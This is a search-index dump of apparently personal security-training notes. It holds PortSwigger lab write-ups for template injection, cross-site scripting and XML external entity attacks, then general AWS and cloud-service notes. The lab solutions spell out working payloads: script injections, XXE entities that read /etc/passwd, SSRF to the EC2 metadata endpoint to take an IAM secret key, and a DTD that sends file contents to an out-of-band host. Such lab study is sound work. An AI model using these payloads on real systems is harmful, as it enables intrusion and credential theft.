                            This lab uses the Freemarker template engine. It is vulnerable to server-side template injection due to its poorly implemented sandbox. To solve the lab, break out of the sandbox to read the file\u00a0my_password.txt\u00a0from Carlos's home directory. Then submit the contents of the file.

                            You can log in to your own account using the following credentials:

                            content-manager:C0nt3ntM4n4g3r

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_5","title":"Solution","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-with-a-custom-exploit","title":"Server-side template injection with a custom exploit","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_6","title":"Enunciation","text":"

                            This lab is vulnerable to server-side template injection. To solve the lab, create a custom exploit to delete the file\u00a0/.ssh/id_rsa\u00a0from Carlos's home directory.

                            You can log in to your own account using the following credentials:\u00a0wiener:peter

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#warning","title":"Warning","text":"

                            As with many high-severity vulnerabilities, experimenting with server-side template injection can be dangerous. If you're not careful when invoking methods, it is possible to damage your instance of the lab, which could make it unsolvable. If this happens, you will need to wait 20 minutes until your lab session resets.

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_6","title":"Solution","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#server-side-template-injection-with-a-custom-exploit_1","title":"Server-side template injection with a custom exploit","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#enunciation_7","title":"Enunciation","text":"

                            This lab is vulnerable to server-side template injection. To solve the lab, create a custom exploit to delete the file\u00a0/.ssh/id_rsa\u00a0from Carlos's home directory.

                            You can log in to your own account using the following credentials:\u00a0wiener:peter

                            Warning

                            As with many high-severity vulnerabilities, experimenting with server-side template injection can be dangerous. If you're not careful when invoking methods, it is possible to damage your instance of the lab, which could make it unsolvable. If this happens, you will need to wait 20 minutes until your lab session resets.

                            ","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-ssti/#solution_7","title":"Solution","text":"","tags":["burpsuite","ssti"]},{"location":"burpsuite/burpsuite-xss/","title":"BurpSuite Labs - Cross-site Scripting","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#reflected-xss-into-html-context-with-nothing-encoded","title":"Reflected XSS into HTML context with nothing encoded","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation","title":"Enuntiation","text":"

                            This lab contains a simple\u00a0reflected cross-site scripting\u00a0vulnerability in the search functionality.

                            To solve the lab, perform a cross-site scripting attack that calls the\u00a0alert\u00a0function.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution","title":"Solution","text":"

                            Copy and paste the following into the search box:

                            <script>alert(1)</script>\n

                            Click Search.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#stored-xss-into-html-context-with-nothing-encoded","title":"Stored XSS into HTML context with nothing encoded","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_1","title":"Enuntiation","text":"

                            This lab contains a\u00a0stored cross-site scripting\u00a0vulnerability in the comment functionality.

                            To solve this lab, submit a comment that calls the\u00a0alert\u00a0function when the blog post is viewed.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_1","title":"Solution","text":"

                            Go to a post, and in the comment box enter:

                            <script>alert(1)</script>\n

                            Once you go back to the post, the script will be load.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#dom-xss-in-documentwrite-sink-using-source","title":"DOM XSS in\u00a0document.write\u00a0sink using source","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_2","title":"Enuntiation","text":"

                            This lab contains a\u00a0DOM-based cross-site scripting\u00a0vulnerability in the search query tracking functionality. It uses the JavaScript\u00a0document.write\u00a0function, which writes data out to the page. The\u00a0document.write\u00a0function is called with data from\u00a0location.search, which you can control using the website URL.

                            To solve this lab, perform a\u00a0cross-site scripting\u00a0attack that calls the\u00a0alert\u00a0function.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_2","title":"Solution","text":"

                            Use the searchbox lo look for some alphanumeric characters and see in the response where those characters have been reflected. In this case, it was in an image:

                            Now, escape those characters. For instance with:

                            \"><SCRIPT>alert(1)</sCripT>\n
                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#dom-xss-in-innerhtml-sink-using-source","title":"DOM XSS in\u00a0innerHTML\u00a0sink using source","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_3","title":"Enuntiation","text":"

                            This lab contains a\u00a0DOM-based cross-site scripting\u00a0vulnerability in the search blog functionality. It uses an\u00a0innerHTML\u00a0assignment, which changes the HTML contents of a\u00a0div\u00a0element, using data from\u00a0location.search.

                            To solve this lab, perform a\u00a0cross-site scripting\u00a0attack that calls the\u00a0alert\u00a0function.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_3","title":"Solution","text":"

                            Reviewing my notes, if we're looking for a DOM based XSS a good proof of concept would be: swisskyrepo/PayloadsAllTheThings

                            An extensive XSS payload list can be used from Payloadbox but It's hard to tell which one is a positive and for this lab you will end up with a list of 124 possible payloads.

                            To solve the lab, enter in the searchbox:

                            #\"><img src=/ onerror=alert(2)>\n

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#dom-xss-in-jquery-anchor-href-attribute-sink-using-locationsearch-source","title":"DOM XSS in jQuery anchor\u00a0href\u00a0attribute sink using\u00a0location.search\u00a0source","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_4","title":"Enuntiation","text":"

                            This lab contains a\u00a0DOM-based cross-site scripting\u00a0vulnerability in the submit feedback page. It uses the jQuery library's\u00a0$\u00a0selector function to find an anchor element, and changes its\u00a0href\u00a0attribute using data from\u00a0location.search.

                            To solve this lab, make the \"back\" link alert\u00a0document.cookie.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_4","title":"Solution","text":"

                            In home page, pay attention to the link in \"\u00a0Submit feedback\". In home is pointing to \"/feedback?returnpath=/.

                            Edit source code and add to the parameter javascript:alert(document.cookie) so that the final href attribute is:

                            /feedback?returnpath=/javascript:alert(document.cookie)\n

                            Click on Submit feedback.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#dom-xss-in-jquery-selector-sink-using-a-hashchange-event","title":"DOM XSS in jQuery selector sink using a hashchange event","text":"","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#enuntiation_5","title":"Enuntiation","text":"

                            This lab contains a\u00a0DOM-based cross-site scripting\u00a0vulnerability on the home page. It uses jQuery's\u00a0$()\u00a0selector function to auto-scroll to a given post, whose title is passed via the\u00a0location.hash\u00a0property.

                            To solve the lab, deliver an exploit to the victim that calls the\u00a0print()\u00a0function in their browser.

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xss/#solution_5","title":"Solution","text":"

                            Copied from Burpsuite:

                            1. Notice the vulnerable code on the home page using Burp or the browser's DevTools.
                            2. From the lab banner, open the exploit server.
                            3. In the\u00a0Body\u00a0section, add the following malicious\u00a0iframe:

                              <iframe src=\"https://YOUR-LAB-ID.web-security-academy.net/#\" onload=\"this.src+='<img src=x onerror=print()>'\"></iframe> 4. Store the exploit, then click\u00a0View exploit\u00a0to confirm that the\u00a0print()\u00a0function is called. 5. Go back to the exploit server and click\u00a0Deliver to victim\u00a0to solve the lab

                            ","tags":["burpsuite","xss"]},{"location":"burpsuite/burpsuite-xxe/","title":"BurpSuite Labs - XML External Entity XXE","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xxe-using-external-entities-to-retrieve-files","title":"Exploiting XXE using external entities to retrieve files","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation","title":"Enunciation","text":"

                            This lab has a \"Check stock\" feature that parses XML input and returns any unexpected values in the response.

                            To solve the lab, inject an XML external entity to retrieve the contents of the /etc/passwd file.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution","title":"Solution","text":"
                            # Burpsuite solution\n\n1. Visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n2. Insert the following external entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>`\n3. Replace the `productId` number with a reference to the external entity: `&xxe;`. The response should contain \"Invalid product ID:\" followed by the contents of the `/etc/passwd` file.\n
                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xxe-to-perform-ssrf-attacks","title":"Exploiting XXE to perform SSRF attacks","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_1","title":"Enunciation","text":"

                            This lab has a \"Check stock\" feature that parses XML input and returns any unexpected values in the response.

                            The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is http://169.254.169.254/. This endpoint can be used to retrieve data about the instance, some of which might be sensitive.

                            To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server's IAM secret access key from the EC2 metadata endpoint.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_1","title":"Solution","text":"

                            Capture the check stock request:

                            Perfom the data exfiltration chaining xxe y ssrf. The response will display the next folder that needs to be added to the request:

                            # Burpsuite solution\n1. Visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n2. Insert the following external entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE test [ <!ENTITY xxe SYSTEM \"http://169.254.169.254/\"> ]>`\n3. Replace the `productId` number with a reference to the external entity: `&xxe;`. The response should contain \"Invalid product ID:\" followed by the response from the metadata endpoint, which will initially be a folder name.\n4. Iteratively update the URL in the DTD to explore the API until you reach `/latest/meta-data/iam/security-credentials/admin`. This should return JSON containing the `SecretAccessKey`.\n
                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#blind-xxe-with-out-of-band-interaction","title":"Blind XXE with out-of-band interaction","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_2","title":"Enunciation","text":"

                            This lab has a \"Check stock\" feature that parses XML input but does not display the result.

                            You can detect the blind XXE vulnerability by triggering out-of-band interactions with an external domain.

                            To solve the lab, use an external entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_2","title":"Solution","text":"
                            # Burpsuite solution\n1. Visit a product page, click \"Check stock\" and intercept the resulting POST request in [Burp Suite Professional](https://portswigger.net/burp/pro).\n2. Insert the following external entity definition in between the XML declaration and the `stockCheck` element. Right-click and select \"Insert Collaborator payload\" to insert a Burp Collaborator subdomain where indicated:\n\n    `<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM \"http://BURP-COLLABORATOR-SUBDOMAIN\"> ]>`\n3. Replace the `productId` number with a reference to the external entity:\n\n    `&xxe;`\n4. Go to the Collaborator tab, and click \"Poll now\". If you don't see any interactions listed, wait a few seconds and try again. You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload.\n
                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#blind-xxe-with-out-of-band-interaction-via-xml-parameter-entities","title":"Blind XXE with out-of-band interaction via XML parameter entities","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_3","title":"Enunciation","text":"

                            This lab has a \"Check stock\" feature that parses XML input, but does not display any unexpected values, and blocks requests containing regular external entities.

                            To solve the lab, use a parameter entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#note","title":"Note","text":"

                            To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_3","title":"Solution","text":"
                            1. Visit a product page, click \"Check stock\" and intercept the resulting POST request in [Burp Suite Professional](https://portswigger.net/burp/pro).\n2. Insert the following external entity definition in between the XML declaration and the `stockCheck` element. Right-click and select \"Insert Collaborator payload\" to insert a Burp Collaborator subdomain where indicated:\n\n    `<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM \"http://BURP-COLLABORATOR-SUBDOMAIN\"> %xxe; ]>`\n3. Go to the Collaborator tab, and click \"Poll now\". If you don't see any interactions listed, wait a few seconds and try again. You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload.\n
                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-blind-xxe-to-exfiltrate-data-using-a-malicious-external-dtd","title":"Exploiting blind XXE to exfiltrate data using a malicious external DTD","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_4","title":"Enunciation","text":"

                            This lab has a \"Check stock\" feature that parses XML input but does not display the result.

                            To solve the lab, exfiltrate the contents of the /etc/hostname file.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_4","title":"Solution","text":"
                            # Burpsuite solution\n1. Using [Burp Suite Professional](https://portswigger.net/burp/pro), go to the [Collaborator](https://portswigger.net/burp/documentation/desktop/tools/collaborator) tab.\n2. Click \"Copy to clipboard\" to copy a unique Burp Collaborator payload to your clipboard.\n3. Place the Burp Collaborator payload into a malicious DTD file:\n\n    `<!ENTITY % file SYSTEM \"file:///etc/hostname\"> <!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>\"> %eval; %exfil;`\n4. Click \"Go to exploit server\" and save the malicious DTD file on your server. Click \"View exploit\" and take a note of the URL.\n5. You need to exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. First, visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n6. Insert the following external entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"YOUR-DTD-URL\"> %xxe;]>`\n7. Go back to the Collaborator tab, and click \"Poll now\". If you don't see any interactions listed, wait a few seconds and try again.\n8. You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload. The HTTP interaction could contain the contents of the `/etc/hostname` file.\n
                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-blind-xxe-to-retrieve-data-via-error-messages","title":"Exploiting blind XXE to retrieve data via error messages","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_5","title":"Enunciation","text":"

                            This lab has a \"Check stock\" feature that parses XML input but does not display the result.

                            To solve the lab, use an external DTD to trigger an error message that displays the contents of the /etc/passwd file.

                            The lab contains a link to an exploit server on a different domain where you can host your malicious DTD.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_5","title":"Solution","text":"
                            # Burpsuite solution\n\n1. Click \"Go to exploit server\" and save the following malicious DTD file on your server:\n\n    `<!ENTITY % file SYSTEM \"file:///etc/passwd\"> <!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>\"> %eval; %exfil;`\n\n    When imported, this page will read the contents of `/etc/passwd` into the `file` entity, and then try to use that entity in a file path.\n\n2. Click \"View exploit\" and take a note of the URL for your malicious DTD.\n3. You need to exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. First, visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n4. Insert the following external entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"YOUR-DTD-URL\"> %xxe;]>`\n\n    You should see an error message containing the contents of the `/etc/passwd` file.\n
                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xinclude-to-retrieve-files","title":"Exploiting XInclude to retrieve files","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_6","title":"Enunciation","text":"

                            This lab has a \"Check stock\" feature that embeds the user input inside a server-side XML document that is subsequently parsed.

                            Because you don't control the entire XML document you can't define a DTD to launch a classic XXE attack.

                            To solve the lab, inject an XInclude statement to retrieve the contents of the /etc/passwd file.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_6","title":"Solution","text":"
                            # Burpsuite solution\n\n1. Visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n2. Set the value of the `productId` parameter to:\n\n    `<foo xmlns:xi=\"http://www.w3.org/2001/XInclude\"><xi:include parse=\"text\" href=\"file:///etc/passwd\"/></foo>`\n
                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xxe-via-image-file-upload","title":"Exploiting XXE via image file upload","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_7","title":"Enunciation","text":"

                            This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.

                            To solve the lab, upload an image that displays the contents of the /etc/hostname file after processing. Then use the \"Submit solution\" button to submit the value of the server hostname.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_7","title":"Solution","text":"

                            Afterwards, retrieve the avatar image:

                            # Burpsuite solution\n\n- reate a local SVG image with the following content:\n\n    `<?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\" > ]><svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"><text font-size=\"16\" x=\"0\" y=\"16\">&xxe;</text></svg>`\n- Post a comment on a blog post, and upload this image as an avatar.\n- When you view your comment, you should see the contents of the `/etc/hostname` file in your image. Use the \"Submit solution\" button to submit the value of the server hostname.\n

                            Payload:

                            <?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\" > ]><svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"><text font-size=\"16\" x=\"0\" y=\"16\">&xxe;</text></svg>\n
                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xxe-to-retrieve-data-by-repurposing-a-local-dtd","title":"Exploiting XXE to retrieve data by repurposing a local DTD","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_8","title":"Enunciation","text":"

                            This lab has a \"Check stock\" feature that parses XML input but does not display the result.

                            To solve the lab, trigger an error message containing the contents of the /etc/passwd file.

                            You'll need to reference an existing DTD file on the server and redefine an entity from it.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#hint","title":"Hint","text":"

                            Systems using the GNOME desktop environment often have a DTD at /usr/share/yelp/dtd/docbookx.dtd containing an entity called ISOamso.

                            ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_8","title":"Solution","text":"
                            # Burpsuite solution\n\n1. Visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n2. Insert the following parameter entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM \"file:///usr/share/yelp/dtd/docbookx.dtd\"> <!ENTITY % ISOamso ' <!ENTITY &#x25; file SYSTEM \"file:///etc/passwd\"> <!ENTITY &#x25; eval \"<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>\"> &#x25;eval; &#x25;error; '> %local_dtd; ]>` This will import the Yelp DTD, then redefine the `ISOamso` entity, triggering an error message containing the contents of the `/etc/passwd` file.\n
                            ","tags":["burpsuite","jwt"]},{"location":"cloud/","title":"Pentesting cloud","text":"","tags":["cloud pentesting"]},{"location":"cloud/#basics-about-cloud","title":"Basics about cloud","text":"

                            There are many \"clouds\". But these three cloud providers are the big three players in the market:

                            • Azure: Fundamentals | Security Engineer Level.
                            • Amazon Web Service (AWS): AWS essentials
                            • Google Cloud: GCP essentials
                            ","tags":["cloud pentesting"]},{"location":"cloud/#cloud-services-matrix","title":"Cloud services matrix","text":"Azure AWS GCP Available Regions Azure Regions AWS Regions and Zones Google Compute Regions & Zones Compute Services Virtual Machines Elastic Compute Cloud (EC2) Compute Engine App Hosting Azure App Service Amazon Elastic Beanstalk Google App Engine Serverless Computing Azure Functions AWS Lambda Google Cloud Functions Container Support Azure Container Service EC2 Container Service Google Computer Engine (GCE) Scaling Options Azure Autoscale Auto Scaling Autoscaler Object Storage Azure Blob Storage Amazon Simple Storage (S3) Google Cloud Storage Block Storage Azure Disks Amazon Elastic Block Store Persistent Disk Content Delivery Network (CDN) Azure CDN Amazon CloudFront Cloud CDN SQL Database Options Azure SQL Database Amazon RDS Google Cloud SQL NoSQL Database Options Azure CosmosDB AWS DynamoDB Google Cloud Bigtable Virtual Network Azure Virtual Network Amazon VPC Cloud Virtual Network Private Connectivity Azure ExpressRoute AWS Direct Connect Cloud Interconnect DNS Services Azure DNS Amazon Route S3 Cloud DNS Log Monitoring Azure Log Analytics Amazon CloudTrail Cloud Logging Performance Monitoring Azure Application Insights Amazon CloudWatch Stackdriver Monitoring Administration and Security Azure Entra ID AWS Identity and Access Management Cloud Identity and Access Management Compliance Azure Trust Center AWS CloudHSM Google Cloud Platform Security Analytics Azure Monitor Amazon Kinesis Cloud Dataflow Automation Azure Automation AWS Opsworks Compute Engine Management Management Services & Options Azure Resource Manager Amazon Cloudformation Cloud Deployment Manager Notifications Azure Notification Hub Amazon Simple Notification Service (SNS) None Load Balancing Load Balancing for Azure Elastic Load Balancing Load Balancer","tags":["cloud pentesting"]},{"location":"cloud/#pentesting-cloud_1","title":"Pentesting cloud","text":"
                            • Pentesting Azure.
                            • Pentesting AWS.
                            • Pentesting docker.
                            ","tags":["cloud pentesting"]},{"location":"cloud/apache-cloudstack/apache-cloudstack-essentials/","title":"Apache CloudStack Essentials","text":"

                            Apache CloudStack is open source software designed to deploy and manage large networks of virtual machines, as a highly available, highly scalable Infrastructure as a Service (IaaS) cloud computing platform.

                            Cloudstack is a turnkey solution that includes the entire stack of features most organizations want with an IIS cloud.

                            We talk here about compute orchestration network as a service user and account management, a full and open native API resource accounting and a first class user interface UI. Cloudstack currently supports the most popular hypervisor, VMware KVM, Citrix, Xenserver, Xen Cloud Platform, Oracle VM Server and Microsoft Hyper-V.

                            Users can manage their cloud with an easy to use web interface, command line tools and or a full featured restful API.

                            In addition, Cloudstack provides an API that that is compatible with the Amazon Web service EC2 and S3.

                            • For organizations that wish to deploy hybrid clouds.
                            • Similar to OpenStack dashboard via the cloud stack dashboard.
                            • You can manage all your resources.

                            Link to installation: https://docs.cloudstack.apache.org/en/4.18.0.0/installguide/overview/index.html

                            ","tags":["cloud","apache cloudstack","open source"]},{"location":"cloud/aws/aws-essentials/","title":"Amazon Web Services (AWS) Essentials","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-compute","title":"AWS Compute","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#elastic-computer-cloud-ec2","title":"Elastic Computer Cloud (EC2)","text":"

                            An EC2 instance is a Virtual Server running on AWS. You deploy your EC2 instances into a virtual private cloud or VPC. You can deploy them into public or private subnets.

                            You can choose: OS, CPU, RAM, Storage space, network card, firewall rules (security group), and bootstrap script (configure at fisrt launch, and which is called EC2 User Data). Concept of bootstrap: bootstrapping means launching commands when a machine starts. That script is only run once, at first start. You can: install updates, software, common files from the internet,...

                            Public subnets have a public IP address and can be accessed from the Internet. Private subnets are isolated. They can only communicate with each other within the VPC (unless you install a gateway.

                            Some instance types: t2.micro, t2.xlarge, c5d.4xlarge, r516xlarge, m5.8xlarge,... t2.micro is part of the AWS free tier with up to 750 hours per month. This is the name convention for instances:

                            m5.2xlarge\n# m: instance class\n# 5: generation of the instance \n# 2xlarge: size within the instance class\n

                            There are general purpose instances, storage optimized, network optimized, or memory optimized, for instance.

                            The security groups only have allow rules (because the default is deny).By default, all inbound traffic is blocked and all outbound traffic is authorized. An instance can have multiple security groups. You can attach to your firewall rules security groups.

                            Default user for connecting to EC2 via ssh is ec2-user. So ssh connection would be:

                            ssh -i access-key.pem ec2-user@<IP>\n
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#ami","title":"AMI","text":"

                            AMI stands for Amazon Machine Image and they represent a customization of an EC2 instance. It's similar to the concept of OVA in VirtualBox.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#ec2-image-builder","title":"EC2 Image Builder","text":"

                            EC2 Image Builder is used to automate the creation of VM or container images. It automates the creation, maintain, validate, and test EC2 AMIs. It can be run on a schedule. It's a free service.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-storage","title":"AWS Storage","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-block-store-ebs","title":"Amazon Elastic Block Store (EBS)","text":"

                            Block Storage Device, it's a virtual hard drive in the cloud. The OS reads/writes at the block level. Disks can be internal, or Network attached. The OS sees volumes that can be partitioned and formatted. Use cases:

                            • Use by Amazon EC2 instances.
                            • Relational and non-relational databases.
                            • Enterprises applications.
                            • Containerized applications.
                            • Big data analytics.
                            • File systems.

                            The free tier has 30GB of free EBS storage of type General Purpose (SSD) or Magnetic per month.

                            A definition for EBS would be that they are network drives (not physical drives). They use the network to communicate the instance. They can be detached from an EC2 instance and attached to another very quickly. They are locked to an Availability Zone.

                            They don't need to be attached to any instance. They have also a delete on termination attribute. By default is not deleted. This feature can be triggered from aws-cli.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#ebs-snapshots","title":"EBS Snapshots","text":"

                            It makes a backup (snapshot) of your EBS volume at a point in time. Not necessary to detach volume to do snapshot, but recommended. Snapshot are useful to replicate EBS in different regions. By copying snapshot to a different region you can migrate EBS attached to another in a different region.

                            There is a EBS Snapshot Archive service, that allows you to move a snapshot to an archive tier that is 75% cheaper.

                            Also there is a service of a Recycle Bin, that allows you to retain snapshot. You can define the retain policy for it.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#ec2-instance-store","title":"EC2 Instance Store","text":"

                            EBS volumes are network drives with good but limited performance. If you need a high-performance hardware disk, you have EC2 Instance Store.

                            EC2 Instance Store is good for buffer / cache /scratch data / and temporary content, but not long term.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-file-system-efs","title":"Amazon Elastic File System (EFS)","text":"

                            It uses File Storage, in which a filesystem is mounted to the OS using a network share. A filesystem can be shared by many users. Use cases:

                            • Corporate home directories.
                            • Corporate shared directories.
                            • Big data analytics.
                            • Lift & Shift enterprise applications.
                            • Web serving.
                            • Content management.

                            EFS works only with Linux EC2 instances in multi-AZ.

                            EFS Infrequent Access (EFS-IA) is a storage class cost-optimized for files that you don't access very often. It saves up to 92% of cost compared to EFS Standard. You can have EFS-IA integrated with a Lifecycle policy.

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-fsx","title":"Amazon FSx","text":"

                            Amazon FSx is a managed service to get third party high-performance file system on AWS.

                            It's fully managed. There are 3 services:

                            • FSx for Lustre: High Performance Computing. For machine learning, analytics, video processing, finantial modelling...
                            • FSx for Windows File Server: support SMB and NTFS. Built on Windows File Server. Integrated with Windows Active Directory,
                            • FSx for NetApp ONTAP
                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-simple-storage-services-s3","title":"Amazon Simple Storage Services (S3)","text":"

                            It uses Object Storage Containers. They are usually on-premises. There is no hierarchy of objects in the container. It's used for backup and storage, along with disaster recovery, archive, media hosting, hybrid cloud storage... It uses REST API. Use cases:

                            • Websites.
                            • Mobile applications.
                            • Backup and archiving.
                            • IoT devices.
                            • Big data analytics.

                            As benefits, it has very low-cost object storage, a high durability and multiple storage classes.

                            In S3 you have buckets. A bucket is a container into which you put your objects. You can have those objects inside your bucket public or private to the Internet. Buckets must have an unique name. They are define at the region level.

                            A key is the full path to the file: s3://my-bucket/my-folder/my-file.txt It's composed by a prefix and an object name. Max object size is 5TB (5000 GB).

                            There are S3 Buckets Policies to allow public access. There are also IAM permissions that you can assign to users. You can also have EC Instance Role to grant access to EC2 instances. Additionally, in the Bucket settings you can block public access (this can be also set at an account level).

                            Cool tool: Amazon policy generator

                            ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#creating-a-static-website","title":"Creating a static website","text":"

                            This would be the url: http://bucketname.s3-website-aws-region.amazonaws.com

